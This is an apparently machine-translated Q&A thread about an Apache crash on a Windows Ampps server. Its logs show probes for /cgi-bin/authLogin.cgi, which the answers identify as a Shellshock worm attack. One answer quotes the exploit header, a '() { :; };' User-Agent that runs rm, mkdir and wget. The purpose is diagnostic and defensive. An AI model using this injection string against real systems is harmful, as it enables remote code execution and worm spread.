1

嗨朋友们,

我在 Windows Server 数据中心中使用带有 php 5.3.29 的 Ampps 服务器。

不幸的是,我在 Windows 服务器和我的网站中收到以下提示。

提示标题: 微软视窗

提示信息: Apache http 服务器已停止工作。

一个问题导致程序停止正常工作。windows 将关闭程序并通知您是否有可用的解决方案。

痕迹:

当我跟踪错误和访问日志时,我发现以下日志是原因。

在 Apache 访问日志中:

202.175.83.36 - - [10/Dec/2014:05:58:50 -0500] “GET /cgi-bin/authLogin.cgi HTTP/1.1”404 1335 217.248.177.30 - - [10/Dec/2014:06: 11:24 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335 209.153.244.6 - - [10/Dec/2014:07:09:17 -0500] "GET /cgi-bin/authLogin .cgi HTTP/1.1" 404 1335 81.214.132.245 - - [10/Dec/2014:07:25:04 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335

在 Apache 错误日志中:

[2014 年 12 月 10 日星期三 07:25:04.401073] [cgi:error] [pid 2908:tid 1168] [client 81.214.132.245:36246] 找不到或无法统计脚本:D:/Program Files/Ampps/www/cgi -bin/authLogin.cgi

请帮我。

4

4 回答 4

1

有一个 Web bot 试图获得授权,因此它可以 wget 并执行类似 S0.py 的东西,我认为这是一个蠕虫,因此下载服务器受到了威胁。如果你碰巧得到一份 S0.sh 的副本,我想把它交给exploit-db 或类似的东西。巧妙的命令是: Get /cgi-bin/authLogin.cgi HTTP/1.1.Host: 127.0.0.1.User-Agent:() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget

该文件在下载后执行。我想有一些关于 HDB_DATA 的东西,我什至没有。“信息至上!”

于 2014-12-16T03:06:57.733 回答
0

如果您尝试打开此文件,会发生什么?

D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi

该消息表明该文件不存在,如 404 错误和消息“未找到脚本”所示。

于 2014-12-10T13:12:14.533 回答
0

最后我拒绝那些客户端访问 cgi-bin 目录。

在 cgi-bin 目录中我创建了一个 .htaccess 文件

我在 .htaccess 中添加了以下行

拒绝一切。

于 2014-12-10T13:51:22.347 回答
0

我不认为 authLogin.cgi 真的很重要,只是它可能允许某人执行。问题是用户尝试或成功删除 /tmp/S0.sh 并在共享文件夹中创建目录 php 然后执行 wget。

/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget

这是经过这么长时间的思考之后出现的问题:http: //jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html

“S0.sh 由两个主要部分组成……第一部分进行初始设置并下载附加程序,然后第二部分安装蠕虫并执行一些附加命令。”

所以捕捉这个动作是一种真正的享受,最初没有人知道称之为 Shellshock。那里有一个 S0.sh 的副本,你可以看到它是一个蠕虫,我推测是这种情况。

根据我的阅读,该蠕虫只是浏览 IP 空间,寻找侦听端口 8080 的任何人。

于 2016-11-14T01:01:59.940 回答